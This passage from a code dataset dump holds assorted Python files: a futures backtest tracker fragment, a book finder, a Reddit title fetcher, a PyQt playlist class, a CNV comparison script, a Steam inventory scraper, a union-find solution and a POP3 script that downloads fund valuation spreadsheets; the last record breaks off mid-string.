price_in_dm1)\n else:\n pnl = holdings_in * (price_in_d - price_in_dm1) + holdings_out * (price_out_d - price_out_dm1)\n\n df_tracker.loc[d, 'er_index'] = df_tracker.loc[dm1, 'er_index'] + pnl\n\n contract_rolling_out, contract_rolling_in = get_contracts(d, df_fn.index, roll_schedule, comm_bbg_code)\n\n if d.month != dm1.month:\n holdings_out = holdings_in\n holdings_in = 0\n weights = [1,0]\n\n price_out_d = df_prices[contract_rolling_out].loc[:d].iloc[-1]\n price_out_dm1 = df_prices[contract_rolling_out].loc[:d].iloc[-2]\n price_in_d = df_prices[contract_rolling_in].loc[:d].iloc[-1]\n price_in_dm1 = df_prices[contract_rolling_in].loc[:d].iloc[-2]\n\n df_tracker.loc[d, 'holdings_out'] = holdings_out\n df_tracker.loc[d, 'holdings_in'] = holdings_in\n df_tracker.loc[d, 'w_out'] = weights[0]\n df_tracker.loc[d, 'w_in'] = weights[1]\n df_tracker.loc[d, 'price_out_today'] = price_out_d\n df_tracker.loc[d, 'price_in_today'] = price_in_d\n df_tracker.loc[d, 'price_out_yst'] = price_out_dm1\n df_tracker.loc[d, 'price_in_yst'] = price_in_dm1\n df_tracker.loc[d, 'contract_rolling_out'] = contract_rolling_out\n df_tracker.loc[d, 'contract_rolling_in'] = contract_rolling_in\n\n 
else:\n\n weights = get_contract_weights(d, df_prices.index, roll_start_bday=roll_start_bday,\n roll_window_size=roll_window_size)\n\n holdings_out = weights[0] * df_tracker.loc[d, 'er_index'] / price_out_d\n holdings_in = weights[1] * df_tracker.loc[d, 'er_index'] / price_in_d\n holdings_out = 0 if math.isnan(holdings_out) else holdings_out\n holdings_in = 0 if math.isnan(holdings_in) else holdings_in\n\ndf = df_tracker.dropna(how='all')\n\ndf.to_excel(writer,'backtest')\nwriter.save()\n\n","repo_name":"RafaelPeon/TrabInsper","sub_path":"build_comm_futures_tracker_v2.py","file_name":"build_comm_futures_tracker_v2.py","file_ext":"py","file_size_in_byte":7883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"26582141214","text":"import webbrowser\n\nfrom book_resources import *\nfrom ui import UserInterface, ConsoleUI\n\n# installed modules:\n# BeautifulSoup4\n# requests\n\n\nclass Application:\n def __init__(self, ui: UserInterface):\n search_results_limit = 5\n\n self.__ui = ui\n self.__resources: List[BookResource] = [\n ManyBooksResource(search_results_limit),\n # FreeComputerBooksResource(search_results_limit),\n FreeEBooksResource(search_results_limit)\n ]\n self.strict_mode = False\n\n self.__ui.hooks['on_strict_mode_enabled'] = self.enable_strict_mode\n self.__ui.hooks['on_strict_mode_disabled'] = self.disable_strict_mode\n\n def enable_strict_mode(self):\n self.strict_mode = True\n\n def disable_strict_mode(self):\n self.strict_mode = False\n\n def start(self):\n self.__ui.show_intro()\n\n while True:\n book_name = self.__ui.ask_book_name()\n search_results = self.search(book_name)\n\n self.__ui.show_search_results(search_results)\n\n while True:\n result_number = self.__ui.ask_search_result_number(len(search_results))\n\n if result_number == 0:\n break\n\n book_to_open = search_results[result_number - 1]\n webbrowser.open(book_to_open.url)\n\n def search(self, book_name: str) -> List[BookSearchResult]:\n results = []\n\n for resource in self.__resources:\n search_results = resource.search(book_name, self.strict_mode)\n results.extend(search_results)\n\n return results\n\n\napp = Application(ConsoleUI())\napp.start()\n","repo_name":"s11114204/book-finder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"6312585109","text":"#!/usr/bin/python3\n\"\"\"prints the titles of the first 10 hot posts \"\"\"\nfrom requests import get\n\n\ndef top_ten(subreddit):\n \"\"\"Retrieves the title of the top ten posts from a given subreddit.\"\"\"\n url = 'https://www.reddit.com'\n headers = {\n 'Accept': 'application/json',\n 'User-Agent': ' '.join([\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',\n 'AppleWebKit/537.36 (KHTML, like Gecko)',\n 'Chrome/97.0.4692.71',\n 'Safari/537.36',\n 'Edg/97.0.1072.62'\n ])\n }\n sort = 'top'\n limit = 10\n res = get(\n '{}/r/{}/.json?sort={}&limit={}'.format(\n url,\n subreddit,\n sort,\n limit\n ),\n headers=headers,\n allow_redirects=False\n )\n if res.status_code == 200:\n for post in res.json()['data']['children'][0:10]:\n print(post['data']['title'])\n else:\n print(None)\n","repo_name":"mgmtsweni/alx-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"} 
+{"seq_id":"36622630934","text":"# coding:utf-8\n\nfrom random import shuffle\nfrom enum import Enum\nfrom json import dump, load\n\nfrom PyQt5.Qt import QUrl, pyqtSignal\nfrom PyQt5.QtMultimedia import QMediaContent, QMediaPlaylist\n\n\nclass PlaylistType(Enum):\n \"\"\" 播放列表种类枚举 \"\"\"\n SONG_CARD_PLAYLIST = 0 # 播放列表为一首歌\n SONGER_CARD_PLAYLIST = 1 # 播放列表为选中歌手的歌\n ALBUM_CARD_PLAYLIST = 2 # 播放列表为选中专辑的歌\n LAST_PLAYLIST = 3 # 上一次的播放列表\n NO_PLAYLIST = 4 # 没有播放列表\n CUSTOM_PLAYLIST = 5 # 自定义播放列表\n ALL_SONG_PLAYLIST = 6 # 播放列表为歌曲文件夹中的所有歌曲\n\n\nclass MediaPlaylist(QMediaPlaylist):\n \"\"\" 播放列表类 \"\"\"\n # 当播放列表的当前下标变化时发送信号,用于更新主界面\n switchSongSignal = pyqtSignal(dict)\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n # 创建一个用于存储顺序播放列表的列表\n self.playlist = []\n # 保存当前的歌曲在随机播放列表中的下标\n self.currentRandomPlayIndex = 0\n # 初始化播放列表种类\n self.playlistType = PlaylistType(PlaylistType.LAST_PLAYLIST)\n # 初始化播放列表\n self.__initPlaylist()\n\n def __initPlaylist(self):\n \"\"\" 初始化播放列表 \"\"\"\n # 设置播放模式为列表顺序播放\n self.setPlaybackMode(QMediaPlaylist.Sequential)\n # 记录下随机播放前的循环模式\n self.prePlayMode = self.playbackMode()\n # 初始化随机播放按钮按下状态\n self.randPlayBtPressed = False\n # 读入上次的播放列表\n self.__readLastPlaylist()\n if self.playlist:\n for songInfo_dict in self.playlist:\n super().addMedia(QMediaContent(\n QUrl.fromLocalFile(songInfo_dict['songPath'])))\n self.currentIndexChanged.connect(\n lambda index: self.switchSongSignal.emit(self.playlist[index]))\n\n def addMedia(self, songInfo_dict: dict):\n \"\"\" 重载addMedia,一次向尾部添加一首歌 \"\"\"\n if not songInfo_dict:\n return\n self.playlist.append(songInfo_dict)\n super().addMedia(QMediaContent(\n QUrl.fromLocalFile(songInfo_dict['songPath'])))\n\n def addMedias(self, songInfoDict_list: list):\n \"\"\" 向尾部添加要播放的音频文件列表 \"\"\"\n if not songInfoDict_list:\n return\n self.playlist.extend(songInfoDict_list)\n for songInfo_dict in songInfoDict_list:\n super().addMedia(QMediaContent(\n QUrl.fromLocalFile(songInfo_dict['songPath'])))\n\n def insertMedia(self, index, songInfo_dict: dict):\n \"\"\" 在指定位置插入要播放的歌曲 \"\"\"\n super().insertMedia(index, QMediaContent(\n QUrl.fromLocalFile(songInfo_dict['songPath'])))\n self.playlist.insert(index, songInfo_dict)\n\n def insertMedias(self, index: int, songInfoDict_list: list):\n \"\"\" 插入播放列表 \"\"\"\n if not songInfoDict_list:\n return\n self.playlist = self.playlist[:index] + \\\n songInfoDict_list + self.playlist[index:]\n mediaContent_list = [QMediaContent(\n QUrl.fromLocalFile(songInfo_dict['songPath'])) for songInfo_dict in songInfoDict_list]\n super().insertMedia(index, mediaContent_list)\n\n def clear(self):\n \"\"\" 清空播放列表 \"\"\"\n self.playlist.clear()\n super().clear()\n\n def next(self):\n \"\"\" 播放下一首 \"\"\"\n # 如果已经是最后一首就转到第一首歌开始播放\n if self.currentIndex() == self.mediaCount() - 1:\n # 列表循环时切换到第一首\n if self.playbackMode() == QMediaPlaylist.Loop:\n self.setCurrentIndex(0)\n # 切换歌曲时发出信号\n self.switchSongSignal.emit(self.playlist[self.currentIndex()])\n elif self.playbackMode() == QMediaPlaylist.Random:\n super().next()\n else:\n super().next()\n # 切换歌曲时发出信号\n self.switchSongSignal.emit(self.playlist[self.currentIndex()])\n\n def previous(self):\n \"\"\" 播放上一首 \"\"\"\n # 如果是第一首就转到最后一首歌开始播放\n if self.currentIndex() == 0:\n if self.playbackMode() == QMediaPlaylist.Loop:\n self.setCurrentIndex(self.mediaCount() - 1)\n self.switchSongSignal.emit(self.playlist[self.currentIndex()])\n else:\n super().previous()\n self.switchSongSignal.emit(self.playlist[self.currentIndex()])\n\n def setCurrentSong(self, 
 def setCurrentSong(self, songInfo_dict: dict):\n \"\"\" Immediately play this song from the current playlist when its song card is double-clicked or its play button is pressed \"\"\"\n if not songInfo_dict:\n return\n # set the currently playing song\n self.setCurrentIndex(self.playlist.index(songInfo_dict))\n\n def playAlbum(self, songInfoDict_list: list):\n \"\"\" Play the songs of an album \"\"\"\n self.playlistType = PlaylistType.ALBUM_CARD_PLAYLIST\n self.setPlaylist(songInfoDict_list)\n\n def setRandomPlay(self, isRandomPlay=False):\n \"\"\" Decide, based on the current loop mode, whether to enable shuffle when the shuffle button is toggled \"\"\"\n if isRandomPlay:\n self.randPlayBtPressed = True\n # remember the loop mode active before shuffling\n self.prePlayMode = self.playbackMode()\n # only switch to shuffle when not in single-song loop mode\n if self.playbackMode() != QMediaPlaylist.CurrentItemInLoop:\n self.setPlaybackMode(QMediaPlaylist.Random)\n else:\n self.randPlayBtPressed = False\n # restore the previous loop mode\n self.setPlaybackMode(self.prePlayMode)\n\n def setPlaylist(self, songInfoDict_list: list):\n \"\"\" Reset the playlist \"\"\"\n if songInfoDict_list == self.playlist:\n return\n self.clear()\n self.addMedias(songInfoDict_list)\n self.setCurrentIndex(0)\n\n def save(self):\n \"\"\" Save the playlist to a JSON file before the app closes \"\"\"\n with open('Data\\\\lastPlaylist.json', 'w', encoding='utf-8') as f:\n dump(self.playlist, f)\n\n def __readLastPlaylist(self):\n \"\"\" Read the playlist back from the JSON file \"\"\"\n try:\n with open('Data\\\\lastPlaylist.json', encoding='utf-8') as f:\n self.playlist = load(f)\n except:\n self.playlist = []\n\n def removeMedia(self, index):\n \"\"\" Remove a song from the playlist \"\"\"\n currentIndex = self.currentIndex()\n if currentIndex > index:\n currentIndex -= 1\n self.playlist.pop(index)\n super().removeMedia(index)\n self.setCurrentIndex(currentIndex)\n\n def updateOneSongInfo(self, oldSongInfo: dict, newSongInfo: dict):\n \"\"\" Update the info of a single song in the playlist \"\"\"\n if oldSongInfo in self.playlist:\n index = self.playlist.index(oldSongInfo)\n self.playlist[index] = newSongInfo\n\n def updateMultiSongInfo(self, oldSongInfo_list: list, newSongInfo_list: list):\n \"\"\" Update the info of several songs in the playlist \"\"\"\n for oldSongInfo, newSongInfo in zip(oldSongInfo_list, newSongInfo_list):\n self.updateOneSongInfo(oldSongInfo, newSongInfo)\n","repo_name":"imfog/Groove","sub_path":"media_player/media_playlist.py","file_name":"media_playlist.py","file_ext":"py","file_size_in_byte":7501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"73048485422","text":"#!/usr/bin/env python\nimport os\nimport argparse\n\n# Import required classes\nfrom classes.arraycnv import ArrayCnv\nfrom classes.conifercall import ConiferCall\nfrom classes.gatkcall import GatkCall\n\n# Import comparison scripts\nimport comparison.comparison as comcom\n\n# Import parameter scripts\nimport parameters.parameters as parpar\n\n# Import util scripts\nimport utils.filereaders as ufr\nimport utils.filewriters as ufw\n\n\n# Make some parameter defining variables\nTOOL_CHOICES = [\"arraycnvs\", \"false_positives\", \"true_positives\"]\nREQUIRED_PARAMS = {\"arraycnvs\": [\"arraycnvs\", \"file1\", \"file2\", \"label1\", \"label2\", \"outdir\", \"output-prefix\"],\n \"false_positives\": [\"file1\", \"file2\", \"label1\", \"label2\", \"outdir\", \"output-prefix\"],\n \"true_positives\": [\"file1\", \"file2\", \"label1\", \"label2\", \"outdir\", \"output-prefix\"]}\nOPTIONAL_PARAMS = {}\nPARAM_TYPES = {\"arraycnvs\": \"inputfile\",\n \"file1\": \"inputfile\",\n \"file2\": \"inputfile\",\n \"label1\": \"string\",\n \"label2\": \"string\",\n \"outdir\": \"directory\",\n \"output-prefix\": \"string\"}\n
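# Example command lines for each comparison mode; note these keys predate the TOOL_CHOICES list above and are kept for reference.\n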
TOOL_USAGE = {\"conifer_exomedepth\": \"python comparison.py -t conifer_exomedepth -c conifer_classifications.txt -e exomedepth_classifications.txt -o comparison_outdir -op conexo_comparison\",\n \"gatk4_conifer\": \"python comparison.py -t gatk4_conifer -g gatk4_classifications.txt -c conifer_classifications.txt -o comparison_outdir -op gatcon_comparison\",\n \"gatk4_exomedepth\": \"python comparison.py -t gatk4_exomedepth -g gatk4_classifications.txt -e exomedepth_classifications.txt -o comparison_outdir -op gatexo_comparison\",\n \"gatk4_gatk4\": \"python comparison.py -t gatk4_gatk4 -g gatk4_classifications.txt -g2 gatk4_classifications_2.txt -a array_goldstandard.txt -o comparison_outdir -op gatkgatk_comparison\",\n \"conifer_conifer\": \"python comparison.py -t conifer_conifer -c conifer_classifications.txt -c2 conifer_classifications_2.txt -a array_goldstandard.txt -o comparison_outdir -op concon_comparison\",\n \"exomedepth_exomedepth\": \"python comparison.py -t exomedepth_exomedepth -e exomedepth_classifications.txt -e2 exomedepth_classifications_2.txt -a array_goldstandard.txt -o comparison_outdir -op exdexd_comparison\"}\n\n\ndef main():\n compare_parameters = parpar.get_comparison_parameters(TOOL_CHOICES)\n incorrect_parameters = parpar.parameters_are_ok(compare_parameters, REQUIRED_PARAMS, PARAM_TYPES)\n\n if len(incorrect_parameters) == 0:\n tool1_label = compare_parameters[\"label1\"]\n tool2_label = compare_parameters[\"label2\"]\n print(f\"...Reading {tool1_label} classification data...\")\n tool1data = ufr.read_classification_file(compare_parameters[\"file1\"])\n print(f\"...Reading {tool2_label} classification data...\")\n tool2data = ufr.read_classification_file(compare_parameters[\"file2\"])\n\n # Perform comparison between two tools for found array CNVs\n if compare_parameters[\"tool\"] == \"arraycnvs\":\n print(\"...Reading array CNV data...\")\n arraydata = ufr.read_array_cnvs(compare_parameters[\"arraycnvs\"])\n print(f\"...Perform the comparison between {tool1_label} and {tool2_label}...\")\n comparisondata = comcom.perform_comparison(tool1_label, tool1data, tool2_label, tool2data, arraydata, compare_parameters[\"tp-per-acnv\"])\n\n outfilepath = compare_parameters[\"outdir\"] + \"/\" + compare_parameters[\"output-prefix\"] + \".txt\"\n print(f\"...Writing comparison data to output file {outfilepath}...\")\n wrote_file = ufw.write_comparison_data(outfilepath, comparisondata, tool1_label, tool2_label)\n print(f\"...Wrote comparison output file?: {wrote_file}...\")\n\n # Perform comparison between two tools for False Positives\n if compare_parameters[\"tool\"] == \"false_positives\":\n comparisondata = comcom.compare_fps(tool1_label, tool1data, tool2_label, tool2data)\n outfilepath = compare_parameters[\"outdir\"] + \"/\" + compare_parameters[\"output-prefix\"] + \".txt\"\n wrote_file = ufw.write_fp_comparison(outfilepath, comparisondata, tool1_label, tool2_label)\n print(f\"...Wrote comparison output file?: {wrote_file}...\")\n\n # Perform comparison between two tools for True Positives\n if compare_parameters[\"tool\"] == \"true_positives\":\n comparisondata = comcom.compare_tps(tool1_label, tool1data, tool2_label, tool2data)\n outfilepath = compare_parameters[\"outdir\"] + \"/\" + compare_parameters[\"output-prefix\"] + \".txt\"\n wrote_file = ufw.write_tp_comparison(outfilepath, comparisondata, tool1_label, tool2_label)\n print(f\"...Wrote comparison output file?: {wrote_file}...\")\n else:\n print(\"Please set the following parameters: \" + \", \".join(incorrect_parameters))\n\n\nif __name__ == \"__main__\":\n main()\n
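# reached only after main() has finished writing all comparison output files\n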
print(\"DONE!\")\n","repo_name":"molgenis/NGS_CNV","sub_path":"scripts/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"10259576380","text":"import sys\nimport time\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\ndef scroll_down(driver):\n \"\"\"A method for scrolling the page.\"\"\"\n\n # Get scroll height.\n last_height = driver.execute_script(\"return document.body.scrollHeight\")\n\n while True:\n\n # Scroll down to the bottom.\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n # Wait to load the page.\n time.sleep(0.1)\n\n # Calculate new scroll height and compare with last scroll height.\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n\n if new_height == last_height:\n\n break\n\n last_height = new_height\n\ndef find_all_CSGO_items(driver: webdriver, profile_id: str , wait:int = 3) -> list:\n profile_url = f\"https://steamcommunity.com/profiles/{profile_id}/inventory/\"\n try:\n driver.get(profile_url)\n select = Select(driver.find_element(By.CSS_SELECTOR,\"#responsive_inventory_select\")) # Create Select instance to work with dropdown\n select.select_by_value('#730') # Choose CSGO \n WebDriverWait(driver, 5).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"#acceptAllButton\"))\n ).click()\n scroll_down(driver)\n time.sleep(wait) # When we have number of items we can create wait conditions\n web_element_list = driver.find_elements(By.CSS_SELECTOR,\".item.app730.context2\")\n return web_element_list\n except Exception as e:\n print(e)\n return []\n","repo_name":"bjarkeh97/csgo_middleman","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"24554386929","text":"class Solution:\n def find(self, x, parents):\n if parents[x] == x: return x\n parents[x] = self.find(parents[x], parents)\n return parents[x]\n \n def union(self, x, y, parents, ranks):\n xr, yr = self.find(x, parents), self.find(y, parents)\n if ranks[xr] >= ranks[yr]: parents[yr] = xr\n else: parents[xr] = yr\n if ranks[xr] == ranks[yr]: ranks[xr] += 1\n \n def equationsPossible(self, equations: List[str]) -> bool:\n not_equals = []\n converter = dict()\n conv_idx = 0\n parents = []\n ranks = []\n for i in range(len(equations)):\n a, is_equal, blank, b = equations[i]\n for char in (a, b):\n if char not in converter:\n converter[char] = conv_idx\n parents.append(conv_idx)\n ranks.append(0) \n conv_idx += 1\n is_equal = False if is_equal == '!' 
else True\n x, y = converter.get(a), converter.get(b)\n if not is_equal:\n not_equals.append((x, y))\n continue\n self.union(x, y, parents, ranks)\n \n for x, y in not_equals:\n if self.find(x, parents) == self.find(y, parents):\n return False\n return True\n \n ","repo_name":"all1m-algorithm-study/LeetCode-Solutions","sub_path":"solutions/990/990-yongjoonseo.py","file_name":"990-yongjoonseo.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"} +{"seq_id":"34052596788","text":"\n\ndef init(): \n global videos\n global endpoints\n global request\n global caches\n global tam_cache\n global memorias \n global endpointcache \n global tiempo_endpoint_central \n global descripcion_request \n videos = 0\n endpoints = 0\n request = 0\n caches = 0\n tam_cache = 0\n memorias = []\n endpointcache = []\n tiempo_endpoint_central = []\n descripcion_request = []","repo_name":"mariousm/University","sub_path":"4_Cuarto/Neuronal/Practica3/DatosGoogle.py","file_name":"DatosGoogle.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"9700209625","text":"import inspect\n\n# NOTE: PureLayer is provided by the surrounding library (trax-style layers); it is not defined in this file.\n\n\ndef Fn(name, f, n_out=1): # pylint: disable=invalid-name\n \"\"\"Returns a layer with no weights that applies the function `f`.\n\n `f` can take and return any number of arguments, and takes only positional\n arguments -- no default or keyword arguments. It often uses JAX-numpy (`jnp`).\n The following, for example, would create a layer that takes two inputs and\n returns two outputs -- element-wise sums and maxima:\n\n `Fn('SumAndMax', lambda x0, x1: (x0 + x1, jnp.maximum(x0, x1)), n_out=2)`\n\n The layer's number of inputs (`n_in`) is automatically set to number of\n positional arguments in `f`, but you must explicitly set the number of\n outputs (`n_out`) whenever it's not the default value 1.\n\n Args:\n name: Class-like name for the resulting layer; for use in debugging.\n f: Pure function from input tensors to output tensors, where each input\n tensor is a separate positional arg, e.g., `f(x0, x1) --> x0 + x1`.\n Output tensors must be packaged as specified in the `Layer` class\n docstring.\n n_out: Number of outputs promised by the layer; default value 1.\n\n Returns:\n Layer executing the function `f`.\n \"\"\"\n argspec = inspect.getfullargspec(f)\n if argspec.defaults is not None:\n raise ValueError('Function has default arguments (not allowed).')\n if argspec.varkw is not None:\n raise ValueError('Function has keyword arguments (not allowed).')\n if argspec.varargs is not None:\n raise ValueError('Function has variable args (not allowed).')\n\n def _forward(xs): # pylint: disable=invalid-name\n if not isinstance(xs, (tuple, list)):\n xs = (xs,)\n return f(*xs)\n\n n_in = len(argspec.args)\n name = name or 'Fn'\n return PureLayer(_forward, n_in=n_in, n_out=n_out, name=name)\n","repo_name":"kshitiz28/Text-Summerization","sub_path":"Fn.py","file_name":"Fn.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"} +{"seq_id":"26554590398","text":"import poplib\npoplib._MAXLINE = 20480\nimport time\nimport os\nfrom email.parser import Parser\nfrom email.header import decode_header\nfrom email.utils import parseaddr\nfrom openpyxl import Workbook\nimport re\nimport datetime\nfrom tenacity import retry, wait_fixed, stop_after_attempt\nimport xlrd\n\n\n\n# Locate the requested header cells in the spreadsheet and return their (row, col) positions\ndef 
find_cell_value_r_c(open_sheet, str_list):\n sheet = open_sheet\n rows = sheet.nrows # number of rows\n cols = sheet.ncols # number of columns\n # collect one [row, col] pair for every header cell that is found\n row_col_list = []\n for r in range(0, rows):\n for c in range(0, cols):\n got_cell_value = sheet.cell(r, c).value\n for str_ in str_list:\n # guard against numeric cells ('in' only works on strings), and append a\n # fresh pair per match (the original reused one shared, ever-growing list)\n if isinstance(got_cell_value, str) and str_ in got_cell_value:\n row_col_list.append([r, c])\n if not row_col_list:\n print('The requested values were not found...')\n return row_col_list\n\n# Decode an encoded MIME header string into a normal string\ndef decode_str(s):\n try:\n value, charset = decode_header(s)[0]\n if charset:\n value = value.decode(charset)\n return value\n except:\n pass\n\n# Log in to the mailbox and fetch its state so that subject / sender / send time / attachments can be parsed\n@retry(wait=wait_fixed(3), stop=stop_after_attempt(3))\ndef log_in(host, user, passwd):\n # start the login\n pop_conn = poplib.POP3_SSL(host)\n pop_conn.user(user)\n pop_conn.pass_(passwd)\n pop_conn.noop()\n mail_count = len(pop_conn.list()[1])\n # show the mailbox status: message count and size\n # print('Messages: %s. Size: %s' % pop_conn.stat())\n # print('Debug info...\\nLogin succeeded!\\nThe inbox holds %s messages using %s bytes\\n' % (mail_count, pop_conn.stat()[1]))\n return mail_count, pop_conn\n\n\n# Retrieve a single message\ndef retrive(pop_conn, i):\n try:\n resp_s, lines, octets = pop_conn.retr(i)\n except:\n resp_s, lines, octets = log_in(host, user, passwd)[1].retr(i)\n # decode the raw message\n try:\n msg_content = b'\\r\\n'.join(lines).decode('utf-8')\n msg = Parser().parsestr(msg_content)\n\n except:\n li = []\n for line in lines:\n try:\n line_str = line.decode('utf-8')\n li.append(line_str)\n except:\n pass\n li_ = '\\r\\n'.join(li)\n msg = Parser().parsestr(li_)\n # validate the subject\n if msg.get('Subject'):\n subject = decode_str(msg.get('Subject'))\n else:\n subject = \"None\"\n # validate the date\n try:\n time.strptime(msg.get(\"Date\")[0:24], '%a, %d %b %Y %H:%M:%S')\n date1 = time.strptime(msg.get(\"Date\")[0:24], '%a, %d %b %Y %H:%M:%S') # parse the received time\n send_date_str = time.strftime(\"%Y%m%d\", date1)\n except:\n send_date_str = \"None\"\n pass\n\n # validate the sender\n if msg.get('From'):\n hdr, addr = parseaddr(msg.get('From'))\n address = u'%s' % (addr) # sender address\n else:\n address = \"2\"\n\n return msg, address, subject, send_date_str\n\n\n# Binary search for the index of a message sent on the requested date\ndef binary_search(mail_count_num, request_date):\n global pop_conn\n print('Running binary search, please wait...')\n start = 0\n n = 0\n end = mail_count_num\n while start <= end:\n n = n + 1\n mid = (start + end) // 2\n send_date = retrive(pop_conn, mid)[3]\n if send_date == \"None\":\n # skip unparsable dates instead of looping forever on the same probe\n end = mid - 1\n continue\n if send_date == request_date:\n return mid, n\n elif send_date > request_date:\n end = mid - 1\n else:\n start = mid + 1\n print('Binary search took %s probes' % n)\n return start, n\n\n\n# Extract the send date from the subject line\ndef get_title_date(address, subject):\n # Guotai Junan\n if address in ['zctgsjfs@tg.gtja.com']:\n title_date_ = re.findall(pattern_1, subject)\n return title_date_\n # China Galaxy Securities\n elif address in 'duanjiushuang@chinastock.com.cn':\n # findall returns a list of group tuples here; flatten the first match into YYYYMMDD\n # (joining the raw tuple list, as before, raised TypeError)\n m = re.findall(pattern_2, subject)\n return [''.join(m[0])] if m else []\n # Shenwan Hongyuan\n elif address in ['yangfan1@swhysc.com']:\n m = re.findall(pattern_3, subject)\n return [''.join(m[0])] if m else []\n # Zheshang Securities\n elif address in 'zszqwbfw@stocke.com.cn':\n m = re.findall(pattern_4, subject)\n return [''.join(m[0])] if m else []\n # Orient Securities\n elif address in 'dfjjwb@orientsec.com.cn':\n title_date_ = re.findall(pattern_5, subject)\n return title_date_\n # Sinolink Securities\n elif address in 'cpbbfs@gfund.com':\n title_date_ = re.findall(pattern_6, subject)\n return title_date_\n # CITIC Securities\n elif 
address in 'FAreport@citics.com':\n title_date_ = re.findall(pattern_7, subject)\n return title_date_\n # China Merchants Securities\n elif address in ['yywbfa@cmschina.com.cn']:\n title_date_ = re.findall(pattern_8, subject)\n return title_date_\n # Industrial Futures\n elif address in ['js@cifutures.com.cn']:\n title_date_ = re.findall(pattern_9, subject)\n return title_date_\n # CICC Futures (unreachable: this address already matches the Sinolink branch above)\n elif address in ['cpbbfs@gfund.com']:\n title_date_ = re.findall(pattern_9, subject)\n return title_date_\n # Ping An Asset Management\n elif address in ['admin@service.pingan.com']:\n title_date_ = re.findall(pattern_10, subject)\n return title_date_\n # China Resources Trust\n elif address in ['crtliangy@crctrust.com']:\n m = re.findall(pattern_11, subject)\n return [''.join(m[0])] if m else []\n # Industrial Futures\n elif address in ['yezs@cifutures.com.cn']:\n title_date_ = re.findall(pattern_12, subject)\n return title_date_\n # Huatai Futures\n elif address in ['zggzhd@htfc.com']:\n m = re.findall(pattern_13, subject)\n return [''.join(m[0])] if m else []\n\n\n# Download the attachment of a matching mail into the working directory, then parse the attached valuation spreadsheet\ndef down_parse_attachment(msg, subject):\n global sheet\n # download the attachment\n for part in msg.walk():\n filename = part.get_filename()\n if filename:\n file_name_ = decode_str(filename)\n data = part.get_payload(decode=True)\n write_file = open(file_name_, 'wb')\n write_file.write(data)\n write_file.close()\n print('Mail subject: %s' % subject)\n print('Attachment %s downloaded...' % file_name_)\n print('Attachment download finished')\n # read the attached spreadsheet\n append_rows = []\n open_workbook = xlrd.open_workbook(file_name_)\n print('Parsing attachment...')\n open_sheet = open_workbook.sheet_by_index(0)\n # look up all header positions once instead of re-scanning the sheet for every cell\n positions = find_cell_value_r_c(open_sheet, str_list)\n excel_date = open_sheet.cell(positions[0][0], positions[0][1]).value\n excel_net_value = open_sheet.cell(positions[1][0], positions[1][1]).value\n excel_cash_net = open_sheet.cell(positions[3][0], positions[2][1]).value\n excel_secure_cash = open_sheet.cell(positions[4][0], positions[2][1]).value\n append_rows.append(excel_date)\n append_rows.append(excel_net_value)\n append_rows.append(excel_cash_net)\n append_rows.append(excel_secure_cash)\n sheet.append(append_rows)\n\n# Date regex for each sender's subject line (the Chinese literals must stay as-is: they match the real subjects)\n\n# Guotai Junan\npattern_1 = re.compile('.*?私募证券投资基金([0-9]{8})', re.S)\n# China Galaxy Securities\npattern_2 = re.compile('.*?私募证券投资基金([0-9]{4})年([0-9]{2})月([0-9]{2})日.*?', re.S)\n# Shenwan Hongyuan\npattern_3 = re.compile('.*?私募证券投资基金_([0-9]{4})-([0-9]{2})-([0-9]{2})', re.S)\n# Zheshang Securities\npattern_4 = re.compile('.*?私募证券投资基金_([0-9]{4})-([0-9]{2})-([0-9]{2}).*?', re.S)\n# Orient Securities\npattern_5 = re.compile('([0-9]{8}).*?', re.S)\n# Sinolink Securities\npattern_6 = re.compile('.*?私募证券投资基金_([0-9]{8})', re.S)\n# CITIC Securities\npattern_7 = re.compile('.*?估值表_([0-9]{8})', re.S)\n# China Merchants Securities\npattern_8 = re.compile('.*?私募证券投资基金_([0-9]{8})', re.S)\n# Industrial Futures\npattern_9 = re.compile('.*?私募证券投资基金_([0-9]{8})', re.S)\n# CICC Futures\npattern_10 = re.compile('.*?_([0-9]{8})', re.S)\n# Ping An Asset Management\npattern_11 = re.compile('.*?-([0-9]{4})-([0-9]{2})-([0-9]{2})', re.S)\n# China Resources Trust\npattern_12 = re.compile('.*?估值表([0-9]{8})', re.S)\n# Huatai Futures\npattern_13 = re.compile('.*?_([0-9]{4})-([0-9]{2})-([0-9]{2}).*?', re.S)\n\n\n\n\n# Main entry point\nif __name__ == '__main__':\n # cache the credentials; prompt for login info on the first run\n if os.path.exists('user_info.txt'):\n with open('user_info.txt', 'r') as read_file:\n user_info = read_file.readlines()\n host = user_info[0].strip()\n user = user_info[1].strip()\n passwd = user_info[2].strip()\n else:\n host = input('Enter the 